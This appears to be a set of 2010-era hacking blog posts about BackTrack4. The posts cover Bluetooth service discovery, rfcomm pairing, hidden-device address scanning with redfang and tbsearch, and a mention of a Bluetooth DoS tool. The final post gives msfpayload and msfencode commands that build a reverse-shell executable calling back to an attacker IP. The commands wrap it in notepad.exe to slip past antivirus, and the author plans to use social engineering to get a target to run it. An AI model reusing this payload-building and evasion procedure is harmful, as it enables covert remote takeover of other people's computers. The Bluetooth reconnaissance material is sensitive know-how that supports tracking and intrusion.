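    Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10002
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 10
  "OBEX" (0x0008)

Service Name: Dial-up Networking
Service RecHandle: 0x10003
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: Audio Source
Service RecHandle: 0x10004
Service Class ID List:
  "Audio Source" (0x110a)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 25
  "AVDTP" (0x0019)
    uint16: 0x100
"""

def parse_sdptool(text):
    """Return one {'name', 'handle', 'channel'} dict per service record.
    sdptool separates records with a blank line; a record without an RFCOMM
    channel (L2CAP-only services) gets channel None."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {"name": None, "handle": None, "channel": None}
        for line in block.splitlines():
            s = line.strip()
            if s.startswith("Service Name:"):
                rec["name"] = s.split(":", 1)[1].strip()
            elif s.startswith("Service RecHandle:"):
                rec["handle"] = s.split(":", 1)[1].strip()
            elif s.startswith("Channel:"):
                rec["channel"] = int(s.split(":", 1)[1].strip())
        if rec["handle"] is not None:      # skip header-only blocks
            records.append(rec)
    return records

def rfcomm_services(records):
    """Only the services that can be reached with rfcomm (those with a channel)."""
    return [r for r in records if r["channel"] is not None]

def rfcomm_commands(bdaddr, record, dev=0):
    """The bind/connect lines for one service, as used later in this post."""
    if record["channel"] is None:
        raise ValueError(f"{record['name']} has no RFCOMM channel")
    return [f"rfcomm bind {dev} {bdaddr} {record['channel']}",
            f"rfcomm connect {dev} {bdaddr} {record['channel']}"]

if __name__ == "__main__":
    # Usage: sdptool -i hci0 browse 6C:9B:02:FF:97:2F | python3 sdp_services.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for r in parse_sdptool(text):
        chan = r["channel"] if r["channel"] is not None else "-"
        print(f"{r['handle']:>9}  channel {chan!s:>2}  {r['name'] or '(no name)'}")
```

Pipe the real sdptool output into it and you get one line per service with its handle and channel side by side; the A2DP record shows channel "-", which is exactly the kind of service rfcomm cannot bind to.<br />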
<br />
<br />
So at this stage we have the bdaddr of the test device and a list of services and channels which we will use when we prepare for a connection.<br />
<br />
Next step is preparing a connection with the device, but first some more preparation;<br />
<br />
<div style="color: #38761d;">Editing main.conf</div><div style="color: black;"><span style="color: #38761d;">===============</span>=</div><span style="color: lime;">nano /etc/bluetooth/main.conf</span><br />
Edit the line under <b>Default device class</b> to the class you want; in this case I am imitating a cell phone.<br />
<div style="color: yellow;">Class = 0x500204</div>No need to edit anything else.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/main-conf.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/main-conf.jpg" width="640" /></a></div><br />
<br />
<div style="color: #38761d;">Editing rfcomm.conf<br />
================== </div><div style="color: lime;">nano /etc/bluetooth/rfcomm.conf</div><br />
Edit rfcomm.conf: enable binding, enter the bdaddr of the device you want to connect to, the channel number of the service you want to access and a name for the connection.<br />
Remove the hashes (#) where necessary in the original rfcomm.conf, so that the file finally looks something<br />
like the below; <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-conf.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-conf.jpg" width="640" /></a></div><br />
<br />
<div style="color: #38761d;"></div><div style="color: #38761d;">Editing file permissions</div><div style="color: #38761d;">====================</div>Edit the permissions of the below files in /etc/bluetooth/;<br />
<div style="color: lime;">cd /etc/bluetooth/</div><div style="color: lime;">chmod 755 {main.conf,networking.conf,rfcomm.conf}</div>(These are plain configuration files read by the bluetooth daemon, so they do not need the execute bit that 755 sets; readable, i.e. 644, is enough.)<br />
<i>Not sure that editing main.conf and rfcomm.conf and setting the file permissions is absolutely necessary, as you can set the device class with hciconfig and pass the rfcomm information directly on the command line... </i><br />
<i>But if you can't tell by now... I'm flying as blind as a deaf bat with this ;)</i><br />
<br />
Best to then restart bluetooth service ;<br />
<div style="color: lime;">/etc/init.d/bluetooth restart</div><br />
<br />
<div style="color: #38761d;">Configuring your bluetooth interface with hciconfig</div><div style="color: #38761d;">Reference: <a href="http://linux.die.net/man/8/hciconfig">http://linux.die.net/man/8/hciconfig </a></div><div style="color: #38761d;">===========================================</div><div style="color: lime;">hciconfig -a hci0 up</div><i>Opens and initialises the HCI device</i><br />
<span style="color: lime;">hciconfig -a hci0 class 0x500204</span><br />
<i>Sets the device's class (0x500204 is for Cell Phone)</i><br />
<div style="color: lime;">hciconfig -a hci0 lm accept,master</div><i>Sets the link mode: accept incoming baseband connections and</i><br />
<i>ask to become master when a connection request comes in.</i><br />
<div style="color: lime;">hciconfig -a hci0 lp rswitch,hold,sniff,park</div><i>Sets the link policy (role switch, hold, sniff and park modes allowed).</i><br />
<span style="color: lime;">hciconfig -a hci0 name TEST</span><br />
<i>Sets the name of your bluetooth device</i><br />
<br />
There are various posts on which settings should be enabled, some also mention ;<br />
<div style="color: lime;">hciconfig -a hci0 auth enable </div><div style="color: lime;">hciconfig -a hci0 encrypt enable</div><i>This however interfered with sdptool's capability to browse devices for info, failing with an invalid exchange.</i><br />
<i>(I assume this is due to the device then being set to security mode 3: link-level enforced security, so every link must be authenticated and encrypted before any data is exchanged) </i><br />
<i><a href="http://www.palowireless.com/bluearticles/cc1_security1.asp">http://www.palowireless.com/bluearticles/cc1_security1.asp</a></i><br />
<br />
<br />
<div style="color: #38761d;">Updating the Service Discovery Protocol Database</div><div style="color: #38761d;">Reference: <a href="http://linux.die.net/man/1/sdptool">http://linux.die.net/man/1/sdptool</a></div><div style="color: #38761d;">==========================================</div>For instance; <br />
<div style="color: lime;">sdptool -i hci0 add --handle=0x10001 --channel=9 OPUSH</div><div style="color: lime;">sdptool -i hci0 add --handle=0x10002 --channel=10 FTP</div><div style="color: lime;">sdptool -i hci0 add --handle=0x10003 --channel=1 DUN</div><br />
The handles and channels for the services may be different for other phones so check all info with sdptool.<br />
<br />
<br />
OK, so now that's all done, what am I able to do ?<br />
Well, not so much actually.<br />
<br />
It turns out that the above configurations haven't helped me in connections, however knowing the processes is always a good thing ;) and might as well document it !<br />
<br />
<br />
In all connection attempts, I needed to Accept the connection on the cell phone.<br />
<br />
<div style="color: #38761d;">Connecting with rfcomm</div><div style="color: #38761d;">References: <a href="http://linux.die.net/man/1/rfcomm">http://linux.die.net/man/1/rfcomm</a></div><div style="color: #38761d;"><a href="http://www.palowireless.com/infotooth/tutorial/rfcomm.asp">http://www.palowireless.com/infotooth/tutorial/rfcomm.asp</a></div><div style="color: #38761d;">=======================================</div>First, try a connection to the OPUSH service, which on my cell is on channel 9.<br />
As all the information for this has been entered in <span style="color: yellow;">rfcomm.conf</span>, I can enter:<br />
<div style="color: lime;">rfcomm bind 0</div><div style="color: lime;">rfcomm</div><div style="color: lime;">rfcomm connect 0</div>If the <i>address already in use</i> error comes up, then release the device or all devices;<br />
<span style="color: lime;">rfcomm release 0</span> (the argument is the rfcomm device number, not the hci adapter) or <span style="color: lime;">rfcomm release all</span> and try again.<br />
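The rfcomm.conf entry that <span style="color: lime;">rfcomm bind 0</span> reads when no address is given on the command line, as an added example rather than the author's actual file (the address is the post's test phone; the comment text is mine):<br />

```conf
# /etc/bluetooth/rfcomm.conf (BlueZ 4.x): one block per rfcomm device.
rfcomm0 {
    # bind this entry when `rfcomm bind 0` or `rfcomm bind all` is run
    bind yes;
    # Bluetooth address of the remote device
    device 6C:9B:02:FF:97:2F;
    # RFCOMM channel of the service, here OPUSH as found with sdptool
    channel 9;
    # free-text description shown when `rfcomm` lists the bound devices
    comment "Nokia 2720 OPUSH";
}
```

Only <span style="color: lime;">bind yes;</span> entries are picked up by <span style="color: lime;">rfcomm bind all</span>; the channel has to match what <span style="color: lime;">sdptool browse</span> reports for the service on that particular phone.<br />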
<br />
I have to <b>accept</b> on the cell phone to receive data from 'TEST' <i>(the name given to the bluetooth interface)</i> and then the connection is made.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot06-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot06-1.jpg" width="640" /></a></div><br />
It's probably better practice, though, to enter the full details on the command line;<br />
<div style="color: lime;">rfcomm bind 0 6C:9B:02:FF:97:2F 9</div><div style="color: lime;">rfcomm</div><div style="color: lime;">rfcomm connect 0 6C:9B:02:FF:97:2F 9</div><i>(I am still obliged to accept data on the cell phone)</i><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c9.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c9.jpg" width="640" /></a></div><br />
The rfcomm connection attempt fails for most services as there are no means I can find included in BackTrack4, to reply to the PIN request from the phone.<br />
<br />
<i><b>To check & verify on the PIN request response issue;</b></i><br />
<i><b><a href="http://www.linuxquestions.org/questions/slackware-14/slackware-13-bluetooth-pan-759274/">http://www.linuxquestions.org/questions/slackware-14/slackware-13-bluetooth-pan-759274/</a></b></i><br />
<br />
After much googling and reading I found a reference to using <b>simple-agent</b>, which is included in the Bluez-4.32 package.<br />
I just extracted that file (from the 'test' subfolder), copied simple-agent to, for instance, /etc/bluetooth/ and ran it; it returns <b>Agent registered</b>.<br />
<br />
When a connection attempt with rfcomm to a service prompts a PIN request on the device, as in the OBEX File Transfer example below, simple-agent responds with <b>RequestPinCode</b> along with the bdaddr the request came from and prompts for a PIN.<br />
<br />
Enter the PIN that was entered on the device (in this case 0000) and pairing is successful.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot03-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot03-1.jpg" width="640" /></a></div><br />
Yay ! Connected !<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rfcomm-c10.jpg" width="640" /></a></div><br />
So what have I actually accomplished with all the above ?<br />
Well, it feels like not very much at all, but at least I am a step closer to understanding the connection methods involved.<br />
<br />
With a lot, probably a helluva lot, more time on google and various fora, I hope to be able to learn a bit more about bluetooth hacking.<br />
<br />
This truly is a slow process ;)<br />
<br />
As always, any insightful comments which may help enable the various bluetooth tools in BackTrack4 greatly appreciated.<br />
<br />
<b><i>On to part III ? !</i></b><br />
<br />
<b>Bluetooth mayhem</b> (posted 2010-09-06, last updated 2010-09-12)<br />
So this is going to be a post which will probably be either updated when possible or deleted<br />
depending on the progress I am able to make with bluetooth ;) <br />
<br />
After getting interested in bluetooth again, I came to the conclusion that I really can't get much done at all..<br />
Considering the amount of cash I have spent in the past on wireless adapters to test, getting a pre-paid mobile and a couple of bluetooth dongles and headsets to go crazy on didn't really seem like a bad idea.<br />
<br />
So this will be a post containing some information on the bluetooth side of things that I have been able to get through, which as it stands right now is horrifically little :| <br />
<br />
The bluetooth tools included on BackTrack4 are all somewhat dated and their functionality with BackTrack4 is not well documented, though bluetooth still forms a part of many wireless security courses, so I have a feeling it is simply a lack of documentation.<br />
<br />
The phone I am using to test on is a Nokia 2720 with bluetooth visibility set to permanently visible (except with the tests of tbsearch & fang)<br />
I have a couple of USB dongles, 2x Class 2 and 1x Class 1.<br />
<br />
<br />
<div style="color: yellow;">SCANNING FOR AND LOGGING BLUETOOTH DEVICES</div><span style="color: yellow;">=============================================</span><br />
<br />
First to ensure that the bluetooth devices are up and running ;<br />
<br />
<div style="color: lime;">hciconfig</div><span style="color: lime;">hciconfig hci0 up</span> <-- in my case an internal bluetooth device<br />
<span style="color: lime;">hciconfig hci1 up</span> <-- in my case an external USB dongle<br />
etc.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="355" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig.jpg" width="640" /></a></div><br />
Getting more info on the bluetooth interface ;<br />
<div style="color: lime;">hciconfig hci0 -a</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig-a.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hciconfig-a.jpg" width="640" /></a></div><br />
There are numerous methods to scan for devices ;<br />
<br />
<div style="color: yellow;"><b>hcitool</b></div><div style="color: yellow;"><b>---------</b></div>hcitool is the most straightforward, comparable with using the iwlist scan option when checking for wireless.<br />
<div style="color: lime;">hcitool dev</div><div style="color: lime;">hcitool -i hci0 scan </div><span style="color: lime;">hcitool -i hci0 inq</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hcitool.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hcitool.jpg" width="640" /></a></div><br />
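The logging half of "scanning for and logging" is what BlueScan and tbear add on top of hcitool. The script below is an added example, not code from the post or from BackTrack: it parses the text that <span style="color: lime;">hcitool -i hci0 scan</span> and <span style="color: lime;">hcitool -i hci0 inq</span> print, merges both into one record per bdaddr, decodes the major device class and keeps first/last seen times, which is the shape a defender's rogue-device inventory needs. The sample output is constructed; only 6C:9B:02:FF:97:2F is an address taken from the post.<br />

```python
"""Bluetooth device inventory built from hcitool output.

Added example (not code from the original post): parses `hcitool scan` and
`hcitool inq` output, merges them per bdaddr and tracks first/last seen.
Sample output below is constructed; only 6C:9B:02:FF:97:2F is from the post.
"""
import re

# Major device class = bits 8..12 of the 24-bit Class of Device (Bluetooth assigned numbers).
MAJOR_DEVICE_CLASS = {
    0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
    0x03: "LAN/Network access point", 0x04: "Audio/Video",
    0x05: "Peripheral", 0x06: "Imaging", 0x07: "Wearable",
    0x08: "Toy", 0x09: "Health", 0x1F: "Uncategorized",
}

BDADDR = r"(?P<bdaddr>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
# scan line:  "\t6C:9B:02:FF:97:2F\tNokia 2720"
SCAN_LINE = re.compile(r"^\s*" + BDADDR + r"\s+(?P<name>\S.*?)\s*$")
# inq line:   "\t6C:9B:02:FF:97:2F\tclock offset: 0x1bc5\tclass: 0x5a0204"
INQ_LINE = re.compile(r"^\s*" + BDADDR + r"\s+clock offset:\s*0x[0-9A-Fa-f]+"
                      r"\s+class:\s*0x(?P<cod>[0-9A-Fa-f]{6})\s*$")


def parse_hcitool_scan(text):
    """{bdaddr: name} from `hcitool scan` output; the 'Scanning ...' header is skipped."""
    found = {}
    for line in text.splitlines():
        m = SCAN_LINE.match(line)
        if m:
            found[m.group("bdaddr").upper()] = m.group("name")
    return found


def parse_hcitool_inq(text):
    """{bdaddr: class_of_device} from `hcitool inq` output; the 'Inquiring ...' header is skipped."""
    found = {}
    for line in text.splitlines():
        m = INQ_LINE.match(line)
        if m:
            found[m.group("bdaddr").upper()] = int(m.group("cod"), 16)
    return found


def major_device_class(cod):
    """Human-readable major device class for a Class of Device value."""
    return MAJOR_DEVICE_CLASS.get((cod >> 8) & 0x1F, "Reserved")


def update_inventory(inventory, scan_text, inq_text, seen_at):
    """Merge one scan+inq round into `inventory` (dict keyed by bdaddr) and return it."""
    names = parse_hcitool_scan(scan_text)
    classes = parse_hcitool_inq(inq_text)
    for addr in sorted(set(names) | set(classes)):
        rec = inventory.setdefault(addr, {"first_seen": seen_at, "name": None,
                                          "cod": None, "major_class": None, "rounds": 0})
        rec["last_seen"] = seen_at          # updated every round the device answers
        rec["rounds"] += 1
        if addr in names:
            rec["name"] = names[addr]
        if addr in classes:
            rec["cod"] = classes[addr]
            rec["major_class"] = major_device_class(classes[addr])
    return inventory


# Constructed sample output for one scan round (second address is made up).
SCAN_SAMPLE = (
    "Scanning ...\n"
    "\t6C:9B:02:FF:97:2F\tNokia 2720\n"
    "\t00:11:22:33:44:55\tBT Headset\n"
)
INQ_SAMPLE = (
    "Inquiring ...\n"
    "\t6C:9B:02:FF:97:2F\tclock offset: 0x1bc5\tclass: 0x5a0204\n"
    "\t00:11:22:33:44:55\tclock offset: 0x02a1\tclass: 0x240404\n"
)

if __name__ == "__main__":
    inv = update_inventory({}, SCAN_SAMPLE, INQ_SAMPLE, "2010-09-06 14:00:00")
    for addr, rec in inv.items():
        print(addr, rec["name"], rec["major_class"], "first seen", rec["first_seen"])
```

To run it against a live adapter, feed <span style="color: lime;">subprocess.check_output(["hcitool", "-i", "hci0", "scan"], text=True)</span> and the same for <span style="color: lime;">inq</span> into update_inventory on a timer; devices that appear with a Phone or Computer class and were never seen before are the ones to look at.<br />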
Alternatively you can use one of the many monitoring tools included in BT4 such as ;<br />
BlueScan, Btscanner, ghettotooth, tbear <br />
<br />
<br />
<div style="color: yellow;"><b>BlueScan</b></div><div style="color: yellow;"><b>------------</b></div>BlueScan will show the bdaddr of the device found along with name, manufacturer, active services and active channels, along with time of discovery.<br />
However, I have not figured out how to specify which interface to use; BlueScan always seems to want to use the bdaddr of hci0.<br />
After stopping the scan with Ctrl+C you are given 3 options;<br />
1. Print to screen<br />
2. Export results to log<br />
3. Quit<br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/bluescan/</div><span style="color: lime;">./bluescan</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/BlueScan.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/BlueScan.jpg" width="640" /></a></div><br />
<div style="color: yellow;"><b>Btscanner</b></div><div style="color: yellow;"><b>-------------</b></div>Btscanner uses all available bluetooth interfaces for scanning.<br />
It opens a GUI and works similar to old-school Kismet, listing found bluetooth devices with the possibility to show further information on the devices when selected.<br />
<span style="color: yellow;">i</span> <-- starts an inquiry scan<br />
<span style="color: yellow;">Enter</span> <-- gives further info on the device selected<br />
<span style="color: yellow;">a</span> <-- aborts the scan<br />
<span style="color: yellow;">Q</span> <-- Quits the program<br />
Results for the devices found are logged automatically with a directory created per bdaddr found.<br />
For scanning for devices, I would say that so far as I have seen, this tool is the one to use.<br />
<u><i>edit</i></u><br />
<i>I have come to the conclusion that I am not fond of the way btscanner:</i><br />
<i>> Does not enable the choosing of individual interface adapters.</i><br />
<i>> Logs all the information in separate folders; it makes sense in view of the information included, but it makes it harder to quickly view a list of bdaddr's, names, class etc. once the programme quits.</i><br />
<span style="color: lime;">btscanner</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner1.jpg" width="640" /></a></div><br />
Further info after selecting the found device;<br />
(<span style="color: yellow;">q</span> to return to main menu)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/Btscanner2.jpg" width="640" /></a></div><br />
<div style="color: yellow;"><b>ghettotooth</b></div><div style="color: yellow;"><b>--------------- </b></div>ghettotooth simply lists the bdaddr's and names of the devices found.<br />
A log is made each time ghettotooth is started.<br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/ghettotooth/</div><div style="color: lime;">perl ghettotooth.pl -h </div><div style="color: lime;">perl ghettotooth.pl hci0</div><div style="color: lime;">ls </div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ghettotooth.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ghettotooth.jpg" width="640" /></a></div><br />
<div style="color: yellow;"><b>T-bear</b></div><div style="color: yellow;"><b>---------</b></div>A straightforward bluetooth device locator with options to log the results.<br />
Whichever interface is entered to use, the screen shows hci0 as being in use after a few seconds,<br />
which is a bit confusing.<br />
<u><i>edit</i></u><br />
<i>Well, after having played a bit more with them, I have decided that I like tbear the best for quick scans.</i><br />
<i>The reason is that you can choose which interface adapter to use (even though it doesn't correctly mention that on screen) and it is easy to view a quick list of what was found from the logs after quitting the programme. Plus it looks pretty ;)</i><br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/tbear/</div><div style="color: lime;">./tbear -h</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear1.jpg" width="640" /></a></div><br />
<span style="color: lime;">./tbear -i hci0 -l log</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbear2.jpg" width="640" /></a></div><br />
From what I have read, Tbear did originally come with a load of other tools (http://www.secguru.com/link/tbear_bluetooth_environment_auditing), but in BT4 there are just two other tools with tbear;<br />
<b><span style="color: yellow;">tanya</span></b> & <b><span style="color: yellow;">tbsearch</span></b><br />
<br />
<b style="color: yellow;">tanya </b>is a DoS tool for bluetooth, however I haven't yet played enough with it to get it to work.<br />
<i>I would love to think that the author had a wife / GF called Tanya whose constant rattling reminded him of a DoS..</i><br />
<br />
<b style="color: yellow;">tbsearch </b>is a tool to search for hidden bluetooth devices by checking bluetooth addresses, and it is able to use multiple threads (multiple bluetooth interfaces).<br />
So for instance if you know a device should be in the area and you have the bdaddr or a possible range, you can search for it and tbsearch will find it, even if it is in hidden mode, and continue searching for others.<br />
It's not a fast process however..<br />
<div style="color: lime;">cd /pentest/bluetooth/tbear/</div><div style="color: lime;">./tbsearch</div><div style="color: lime;">./tbsearch -b 6C:9B:02:FF:97:2F hci0 </div>(bluetooth on mobile set to 'hidden')<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b1.jpg" width="640" /></a></div><br />
This process can be sped up a bit using multiple dongles, below I have a total of 4 devices checking it all out with a starting point 7 digits before the bdaddr, but as you can see it came back with a false positive..<br />
(30 instead of 2f)<br />
This happened more or less consistently when using multiple interfaces, checking for individual bdaddr's seems to work better when using a single interface with tbsearch.<br />
<br />
<span style="color: lime;">./tbsearch -b 6C:9B:02:FF:97:29 hci0 hci1 hci2 hci3</span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/tbsearch-b2.jpg" width="640" /></a></div><br />
<div style="color: yellow;"><b>redfang</b></div><div style="color: yellow;"><b>----------</b></div>fang checks for 'hidden' bluetooth devices by scanning a range of bluetooth addresses similar to the above tbsearch but somewhat more refined and expanded.<br />
fang appears to work better than tbsearch in detecting hidden devices using multiple interfaces.<br />
<br />
<div style="color: lime;">cd /pentest/bluetooth/redfang/</div><div style="color: lime;">./fang -h</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-h.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-h.jpg" width="640" /></a></div><br />
The below example is only testing the last 2 digits of the bdaddr of my test phone (set to hidden) using 4 bluetooth interfaces as above with tbsearch.<br />
<span style="color: lime;">./fang -r 6C9B02FF9700-6C9B02FF973F -n 4</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-r.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fang-r.jpg" width="640" /></a></div><br />
A word of warning: bluetooth and WiFi both use part of the 2.4 GHz band.. carrying out this attack with this many dongles basically caused my wireless network to suffer considerably..<br />
This is the easy stuff, now there is a whole lot more to get my head around, but hopefully the motivation will continue to flow as I have to say, for the moment bluetooth feels a bit like ; <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/omgwtf-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/omgwtf-1.jpg" width="320" /></a></div><br />
Some reference material ;<br />
<br />
http://www.backtrack-linux.org/forums/backtrack-howtos/2583-dr_greens-bluesnarfer-bluebugger-guides-old-fourm.html<br />
http://www.sans.edu/resources/securitylab/bluetooth.php<br />
<br />
more to be added.. please leave a comment if you have a link to helpful info.<br />
<br />
<b>Creating an executable with Metasploit and gaining access to target PC</b> (posted 2010-05-31, last updated 2011-04-28)<br />
My goal for this project was to create a reverse_tcp payload and have it executed on the target PC, bypassing the installed antivirus and giving full access to the target PC.<br />
<br />
This of course assumes being on the same network and having a valid IP address.<br />
<br />
<br />
<div style="color: yellow;">Target PC</div><div style="color: yellow;">-----------</div>- Windows XP Home SP3 Fully Patched<br />
(also tested on Windows XP Professional SP3 fully patched)<br />
- AntiVirus fully up to date<br />
- Running Windows Firewall only<br />
<br />
I more or less got where I wanted to be, but had trouble getting any meterpreter payloads past AntiVirus.<br />
<b><i>EDIT</i></b><br />
<b><i>-------</i></b><br />
<i>I did finally manage to get meterpreter past the AV, it is indeed a matter of trying different variations/combinations of various encoders.</i><br />
<br />
Steps taken were as follows ;<br />
> Create an exe file with msfpayload that will create a reverse_tcp connection which will try to connect back to<br />
the 'attackers' machine.<br />
> Use various encoding methods on the exe with msfencode to make the file less obvious to AV<br />
<br />
> Use some social engineering to get the target to run my executable.<br />
<br />
Although antivirus products now mostly pick up the Metasploit payloads, the methods and encoding are evolving and it is interesting to see the methods involved.<br />
I have experienced that the windows/meterpreter/reverse_tcp payloads are more frequently detected than the windows/shell/reverse_tcp payload. <br />
<br />
Different combinations of encoding may help, a bit of trial and error required !<br />
<br />
<br />
PAYLOAD<br />
-------------<br />
<span style="color: yellow;">windows/shell/reverse_tcp</span> the payload<br />
<span style="color: yellow;">LHOST=192.168.1.105</span> the local IP the payload will try to connect back to<br />
<span style="color: yellow;">LPORT=5632</span> the local port the connection will be listening on<br />
<span style="color: yellow;">R </span> the command to tell msfpayload to output as raw data<br />
<br />
<br />
ENCODING<br />
<i>./msfencode -h for options </i><br />
<i>./msfencode -l to list available encoders</i><br />
----------------------------------------<br />
<span style="color: yellow;">-e</span> to specify the encoder to use<br />
<span style="color: yellow;">-c</span> to specify the number of times to encode the data<br />
<span style="color: yellow;">-t</span> to specify the format (in this example <span style="color: yellow;">raw </span>and for the final step <span style="color: yellow;">exe</span>) <br />
<span style="color: yellow;">-x</span> to specify the win32 exe template to use<br />
<br />
I am using the backslash <span style="color: lime;">\</span> so I can continue the code on another line for clarity's sake. <br />
I have copied notepad.exe (from C:\WINDOWS\system32\) to the framework3 directory.<br />
<br />
<div style="color: lime;">cd /pentest/exploits/framework3/</div><div style="color: lime;"></div><div style="color: lime;">./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | \</div><div style="color: lime;"></div><div style="color: lime;">./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \<br />
./msfencode -e x86/countdown -c 2 -t raw | \</div><div style="color: lime;"></div><div style="color: lime;">./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \</div><div style="color: lime;"></div><div style="color: lime;">./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o payload.exe</div><div style="color: lime;">ls -la | grep exe </div><br />
